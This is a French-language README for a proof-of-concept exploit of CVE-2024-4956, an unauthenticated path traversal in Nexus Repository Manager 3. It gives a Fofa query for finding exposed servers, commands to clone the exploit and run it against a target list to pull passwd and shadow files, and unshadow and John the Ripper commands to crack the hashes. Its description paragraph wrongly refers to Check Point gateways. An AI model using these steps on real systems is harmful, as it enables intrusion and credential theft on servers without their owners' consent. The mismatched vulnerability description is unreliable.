
POC - CVE-2024–4956 - Traversée de chemin non authentifiée dans Nexus Repository Manager 3
Permettant potentiellement à un attaquant de lire certaines informations sur les Check Point Security Gateways une fois connectés à Internet et activés avec Remote Access VPN ou Mobile Access Software Blades. Un correctif de sécurité qui atténue cette vulnérabilité est disponible.
En savoir plus — CVE-2024-4956
Avertissement : Cette preuve de concept (POC) est réalisée uniquement à des fins éducatives et de test éthique. L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables des mauvais usages ou des dommages causés par ce programme.
Pour trouver des cibles potentielles, utilisez Fofa (similaire à Shodan.io) :
header="Server: Nexus/3.53.0-01 (OSS)"
D'abord, clonez le dépôt :
git clone https://github.com/verylazytech/CVE-2024-4956
Ensuite, choisissez votre cible et ajoutez-la au fichier list.txt au format suivant :
Exécutez l'exploit :
python3 CVE-2024-4956.py -l list.txt
La sortie correspond aux fichiers passwd et shadow trouvés :

Maintenant, après avoir trouvé les fichiers passwd et shadow, vous pouvez essayer de craquer le hash avec JohnTheRipper. Après avoir exécuté l'exploit, vous avez 2 fichiers, passwd et shadow, vous pouvez donc les fusionner en un seul fichier et essayer de les craquer (j'ai utilisé rockyou.txt mais cela peut être n'importe quelle liste de mots de passe) :
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt